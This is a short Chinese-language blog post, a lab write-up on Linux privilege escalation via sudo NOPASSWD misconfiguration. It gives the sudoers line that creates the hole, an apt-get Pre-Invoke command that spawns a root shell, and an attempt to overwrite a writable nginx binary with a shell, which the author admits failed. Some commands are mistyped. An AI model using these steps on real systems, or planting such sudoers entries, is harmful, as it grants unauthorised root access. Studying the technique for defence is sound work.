Linux abuse of rights
前言
通过LInux在/etc/sudoers滥配置的提权研究,原文:Linux Privilege Escalation – Using apt-get/apt/dpkg to abuse sudo “NOPASSWD” misconfiguration – Logan S Diomedi – lsdsecurity
正文
为了做好实验我们先做好对应的准备,原文有针对以下几个滥用的提权
NOPASSWD的两个apt-get dpkg
NOPASSWD与/usr/local/openresty/nginx/nginx权限为777 openresty
系统环境为:
Ubuntu 16.04
Ubuntu默认没有安装openresty,安装方法:Ubuntu 平台下OpenResty的安装 - zstu_cc的专栏 - CSDN博客
配置出一个存在提权漏洞的环境:
sudo vim /etc/sudoers
cs ALL=(ALL)NOPASSWD:/usr/bin/apt-get,/usr/bin/nginx,/usr/bin/dpkg
这里的cs为你要测试的用户名NOPASSWD后面的是执行sudo后不用输入密码的命令
配置完之后,切换一个没root权限的用户输入sudo -l即可看到刚刚配置的操作
NOPASSWD:apt提权
查看apt-get帮助手册可以看见,-o []option]的参数用户可以自行设置
图片借用原文:
执行:apt update APT::Update::Pre-InVoke::="/bin/bash -i"
发现权限已经变更
Pre-Invoke是预调用的意思
/usr/local/openresty/nginx/nginx提权
这里我没有成功,由于/us/local/openresty/nginx/sbin/nginx权限为777,导致可以随意写入
执行:
echo "/bin/bash -i" > /usr/local/openresty/nginx/sbin/nginx
然后原文是执行openrety即可提权成功
知道怎么回事的师父可以告诉我一下吗= =#!
转载请声明:转自422926799.github.io
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。
文章标题:Linux abuse of rights
本文作者:九世
发布时间:2019-01-22, 18:07:19
最后更新:2019-04-19, 20:36:16
原始链接:http://jiushill.github.io/posts/f448c508.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。